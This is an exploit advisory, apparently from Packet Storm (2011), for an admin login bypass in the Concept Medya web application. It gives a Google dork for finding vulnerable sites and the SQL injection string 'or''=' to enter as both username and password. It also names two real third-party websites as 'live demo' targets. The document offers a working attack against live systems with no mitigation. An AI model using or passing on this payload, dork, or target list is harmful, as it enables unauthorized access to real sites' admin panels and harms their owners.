Concept Medya SQL Injection

2011-07-26T00:00:00
ID PACKETSTORM:103422
Type packetstorm
Reporter CriminalCoder
Modified 2011-07-26T00:00:00

Description

                                        
                                            `# Exploit Title: Concept Medya Admin Auth ByPass  
# Date: 13 June 2011  
# Author: CriminalCoder  
# Category: webapps  
# Google dork: inurl:login_kontrol.asp  
# Tested on: Windows Xp SP3  
# Home: spyroot.in & rootarea.com  
  
[+] Default admin panel : http://localhost/login_kontrol.asp  
  
[+] ByPass the admin auth by using   
  
Username : 'or''='Password : 'or''='  
  
  
[+] Live Demo ;  
  
[+] http://www.yesilmeninsaat.com/login_kontrol.asp[+] http://www.davedgroup.com/login_kontrol.asp  
  
Greetz; NosLeeP++ - Redd.é - SanaLTahriP - TechnicaL - TheMirkin   
`